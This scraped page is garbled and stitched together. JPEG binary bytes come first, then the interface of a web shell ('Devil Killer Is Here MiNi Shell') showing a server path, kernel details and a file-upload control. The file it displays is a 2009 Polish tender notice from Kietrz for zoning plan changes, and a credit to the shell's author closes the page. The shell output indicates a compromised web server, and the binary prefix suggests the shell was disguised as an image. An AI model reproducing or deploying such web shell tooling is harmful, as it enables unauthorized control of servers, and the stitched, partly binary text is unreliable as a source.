JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23262-N-2009.html

<p class="kh_header"><b>Kietrz: Zmiany miejscowego planu zagospodarowania przestrzennego obejmujące obszar w granicach aministracyjnych miasta Kietrz</b><br>
<b>Numer ogłoszenia: 23262 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kietrz , ul. 3-go Maja 1, 48-130 Kietrz, woj. opolskie, tel. 077 4854356, faks 077 4854359.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kietrz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiany miejscowego planu zagospodarowania przestrzennego obejmujące obszar w granicach aministracyjnych miasta Kietrz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego obejmujące   
      obszar w granicach administracyjnych miasta Kietrz - zgodnie z uchwałą Nr   
      XXVIII/151/2008 Rady Miejskiej w Kietrzu z dnia 27 listopada 2008 roku (zał. Nr 7 do  
      siwz). Granice administracyjne miasta określone są w załączniku Nr 8 do siwz.
2. Powierzchnia obszaru opracowania : 1645,37 ha.
3. Dokumentacja planistyczna składać się będzie z:
      1) Diagnozy stanu istniejącego (szczegółowa inwentaryzacja) wraz z koncepcją rozwiązań  
          planu - 2 egz.
      2) Opracowania ekofizjograficznego w skali: 1:2000 - 2 egz. 
      3) Prognozy oddziaływania na środowisko, zgodnie z ustawą z dnia 3.10. 2008  
          roku (Dz.U. Nr 199/2008 poz. 1227,  w skali 1: 2000 - 4 egz.
      4) Prognozy skutków finansowych uchwalonego planu - 4 egz. 
      5) Ustaleń planu i rysunku planu w skali 1: 2000 w formie projektu Uchwały Rady  
          Miejskiej  (w kolorze)- 6 egz.
      6) Dokumentacji formalno-prawnej - 2 egz.
      7) Wniosku o uzyskanie zgody na przeznaczenie gruntów rolnych na cele nierolnicze oraz  
           leśnych na cele nieleśne zgodnie z ustawą z dnia 03.02.1994 r. o ochronie gruntów  
           rolnych i leśnych ,  oraz ustawą z dnia 19.12. 2008 r. o zmianie ustawy o  
           ochronie gruntów rolnych i leśnych  (Dz.U.Nr 237, poz.1657) o ile z koncepcji  
           zagospodarowania wyniknie koniczność jego sporządzenia - 6 egz.
4.  Dokumentacja planistyczna winna być opracowana zgodnie z ustawą o planowaniu i  
       zagospodarowaniu przestrzennym (Dz.U.z 2003r. 80 poz. 717 z późn. zm) oraz   
       Rozporządzeniem Ministra Infrastruktury w sprawie wymaganego zakresu projektu planu  
       miejscowego (Dz.U. z 2003 r. Nr 164, poz.1587). 
5. Jeden egzemplarz  
       planu winien  być podklejony materiałem wzmacniającym , który umożliwi długotrwałe i  
       czytelne korzystanie z mapy, przystosowany do powieszenia na ścianie (np.  
       zabezpieczenie przeźroczystym laminatem).
       Dokumentacja winna być dostarczona w wersji elektronicznej na nośniku CD, teksty w   
       formacie MS WORD oraz PDF, grafika w formacie JPG  i w programie MapInfo.
6.Wykonawca winien pozyskać dokumentację geodezyjno-kartograficzną niezbędną do  
       przedmiotowego opracowania oraz  wypisy z ewidencji gruntów. 
8. Wykonawca jest zobowiązany do obsługi formalno-prawnej oraz kancelaryjnej związanej  
       z tokiem prac(m.in. zawiadomienia z rozdzielnikiem, obwieszczenia, przygotowanie  
       informacji o uwagach dotyczących projektu planu)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w niniejszej specyfikacji mogą ubiegać się wykonawcy którzy:
1. Spełniają wymagania określone w art.22 ust.1 ustawy Prawo zamówień publicznych i nie  
       podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Pzp.
2. W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  
      zamówienia , a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie wykonali  
      co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej  
      przedmiot zamówienia, których należyte wykonanie zostało potwierdzone. Przez usługę  
      odpowiadająca swoim rodzajem i wartością przedmiotowi niniejszego zamówienia należy  
      rozumieć wykonanie  miejscowego planu zagospodarowania przestrzennego, wykonanie  
      zmian do miejscowego planu zagospodarowania, wykonanie studium uwarunkowań i    
      kierunków zagospodarowania przestrzennego, wykonanie zmian do studium. Wartość  
      opracowania winna być nie mniejsza niż 60 000 PLN a powierzchnia której dotyczy  
      opracowanie nie  mniejsza niż 1200 ha. W przypadku wykazania usługi dot. planu, winna   
      ona  być  opublikowana w Dzienniku Urzędowym, w przypadku przedłożenia studium   
      uchwalenie  go przez właściwą Radę. 
3. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne  
      zobowiązania innych podmiotów  do udostępnienia innych osób zdolnych do  
      wykonania zamówienia :
      1) głównym projektantem przynależącym do Izby Urbanistycznej,
      2) pozostałymi osobami  posiadającymi uprawnienia lub kwalifikacje w wymaganych  
          zakresach do sporządzania planu, zgodnie z wymogami ustaw i rozporządzeń t.j.  
          prognozy oddziaływania na środowisko, prognozy skutków finansowych uchwalenia  
          planów oraz ekofizjografia; co najmniej jedna osoba w  danej branży (dopuszczalne jest   
          posiadanie przez jedną osobę więcej niż jednego uprawnienia). 
     
Ocena spełniania warunków  udziału w postępowaniu dokonywana będzie na zasadzie oceny: spełnia /nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Oświadczenie o spełnieniu warunków określonych w art.22 ust 1 u Pzp oraz o nie   
      podleganiu wykluczenia   z postępowania na podstawie  art. 24 ust. 1 i 2 u Pzp - wzór  
      oświadczenia stanowi załącznik Nr 2 do SIWZ.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  
      działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub   
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6   
      miesięcy przed upływem terminu składania ofert.
3. Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia  
      postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia  
      działalności jest krótszy  - w tym okresie, odpowiadających swoim rodzajem i wartością  
      usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, opisu przedmiotu     
      zamówienia  z podaniem wielkości obszaru w ha, dat wykonania oraz nazw  poprzednich  
      zamawiających - wzór wykazu stanowi załącznik Nr 3 do SIWZ. 
4. Dokumenty  potwierdzające, że wykazane usługi były wykonane należycie, np. referencje   
      od poprzednich zamawiających.      
5. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą  
      uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji   
      zawodowych, doświadczenia i wykształcenia , niezbędnych do wykonania zamówienia, a   
      także zakresu wykonywanych przez nie czynności - wzór wykazu  stanowi załącznik Nr  
      4 do SIWZ. 
      Do wykazu należy załączyć kserokopie uprawnień i zaświadczeń o przynależności do   
      właściwej dla danej specjalności Izby Samorządu Zawodowego. 
6. Jeżeli w wykazie wykonawca wskazał osoby , którymi będzie  
      dysponował wymagane jest przedłożenie pisemnego zobowiązania innego podmiotu do 
      udostępnienia osób zdolnych do wykonania zamówienia - wzór zobowiązania stanowi   
      załącznik Nr 5 do SIWZ.
 
Formularz ofertowy winien być wykonany zgodnie z załączonym wzorem - załącznik Nr 1a do SIWZ.
Ponadto do formularza ofertowego należy załączyć harmonogram rzeczowo-finansowo-terminowy zgodnie z załączonym wzorem -  Zał. Nr 1b do SIWZ.

Przedłożone dokumenty winny być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy , oraz form w jakich te dokumenty mogą być składane (Dz.U.Nr 87 z 2006 roku, poz.605 , zmiana Dz.U.Nr 188 z 2008 roku poz.155).  
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z  § 2 powyższego rozporządzenia. 

7. Pełnomocnictwa:
      1) W przypadku gdy wykonawca jest reprezentowany przez osobę lub osoby, których  
          uprawnienie do reprezentacji nie wynika bezpośrednio z załączonych dokumentów 
          pełnomocnictwo winno być przedłożone w formie oryginału lub notarialnie  
          potwierdzonej kopii..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kietrz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kietrzu
ul.3 Maja 1
48-130 Kietrz
Referat Gospodarki Komunalnej Budownictwa i Drogownictwa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 09:00, miejsce: Urząd Miejski w Kietrzu
ul.3 Maja 1
48-130 Kietrz
sekretariat , pok. Nr 21.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com